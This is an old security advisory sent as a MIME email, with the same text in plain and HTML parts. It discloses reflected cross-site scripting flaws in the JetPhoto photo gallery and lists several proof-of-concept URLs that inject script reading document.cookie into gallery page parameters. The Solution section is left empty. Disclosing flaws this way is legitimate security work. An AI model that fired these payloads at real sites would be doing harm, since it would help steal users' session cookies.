------=_Part_14624_21669296.1144720328024
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: http://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#
#the affected system causing the robbery of cookie
#
#Example XSS:
##################################################################
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3Dwebalbum=
&page=3D<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3DJetPhoto=
_Album&page=3D<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=3DJetPhoto_A=
lbum&page=3D<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/detail.php?name=3DJetPhoto_Al=
bum&page=3D<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=3D<script><=
/script><script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3D<sc=
ript>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3D<sc=
ript>alert(
document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# original advisorie: http://www.elitemexico.org/11.txt
##################################################################

------=_Part_14624_21669296.1144720328024
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

###########################################################################=
<br># Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabil=
itie<br># <br># <br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a hre=
f=3D"mailto:zeus@diosdelared.com">
zeus@diosdelared.com</a><br># Website: <a href=3D"http://www.elitemexico.or=
g">www.elitemexico.org</a><br># Date: 10/04/06<br># Risk: Medium<br># Vendo=
r Url: <a href=3D"http://www.jetphotosoft.com">http://www.jetphotosoft.com<=
/a>
<br># Affected Software: JetPhoto<br># Non Affected: <br>#<br>#Info:<br>###=
###############################################################<br>#this bu=
g consists of inserting script in the line of execution of <br>#<br>#the af=
fected system causing the robbery of cookie
<br>#<br>#Example XSS: <br>################################################=
##################<br>#<br>#http://www.vuln.com/[path]/view/Classic.view/th=
umbnail.php?name=3Dwebalbum&amp;page=3D&lt;script&gt;alert(document.cookie)=
;&lt;/script&gt;
<br>#<br>#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=
=3DJetPhoto_Album&amp;page=3D&lt;script&gt;alert(document.cookie);&lt;/scri=
pt&gt;<br>#<br>#http://www.vuln.com/[path]/view/Classic.view/gallery.php?na=
me=3DJetPhoto_Album&amp;page=3D&lt;script&gt;alert(
document.cookie);&lt;/script&gt;<br>#<br>#http://www.vuln.com/[path]/view/C=
lassic.view/detail.php?name=3DJetPhoto_Album&amp;page=3D&lt;script&gt;alert=
(document.cookie);&lt;/script&gt;<br>#<br>#http://www.vuln.com/[path]/view/=
Orange.view/slideshow.php?name=3D&lt;script&gt;&lt;/script&gt;&lt;script&gt=
;alert(
document.cookie);&lt;/script&gt;<br>#<br>#http://www.vuln.com/[path]/view/O=
range.view/detail.php?name=3D1&amp;page=3D&lt;script&gt;alert(document.cook=
ie);&lt;/script&gt;<br>#<br>#http://www.vuln.com/[path]/view/Orange.view/de=
tail.php?name=3D1&amp;page=3D&lt;script&gt;alert(
document.cookie);&lt;/script&gt;<br>#<br>##################################=
################################<br>#<br>#Solution:<br>####################=
##############################################<br>#<br>#<br>#VULNERABLE VER=
SIONS
<br>##################################################################<br>#=
all<br>#<br>###############################################################=
###<br>#Contact information<br>#0o_zeus_o0<br>#zeus@<a href=3D"http://diosd=
elared.com">
diosdelared.com</a><br>#www.elitemexico.org<br>############################=
######################################<br>#greetz: lady fire,Mi beba, olimp=
us klan team and elitemexico<br># <br># original advisorie: <a href=3D"http=
://www.elitemexico.org/11.txt">
http://www.elitemexico.org/11.txt</a><br>##################################=
################################

------=_Part_14624_21669296.1144720328024--